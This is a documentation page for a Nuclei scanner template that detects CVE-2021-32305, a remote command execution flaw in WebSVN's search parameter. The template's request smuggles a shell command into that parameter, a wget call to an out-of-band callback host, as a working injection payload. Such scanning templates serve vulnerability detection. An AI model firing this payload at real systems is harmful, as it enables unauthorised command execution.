Websvn <2.6.1 - Remote Code Execution
ID: CVE-2021-32305
Severity: critical
Author: gy741
Tags: cve,cve2021,websvn,rce,oast,packetstorm
Description
Section titled “Description”WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
YAML Source
Section titled “YAML Source”id: CVE-2021-32305
info: name: Websvn <2.6.1 - Remote Code Execution author: gy741 severity: critical description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html - https://github.com/websvnphp/websvn/pull/142 - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://github.com/HimmelAward/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-32305 cwe-id: CWE-78 epss-score: 0.96624 epss-percentile: 0.99551 cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: websvn product: websvn tags: cve,cve2021,websvn,rce,oast,packetstorm
http: - raw: - | GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */*
matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"# digest: 4b0a00483046022100ec5dcb7652652883597e997923fecc1a0696734d5d7135048a0e3ca8e148d4e6022100c09446dde65305a8935afaf21023a9317fdd0516dad4e131033ca9e9964f800a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-32305.yaml"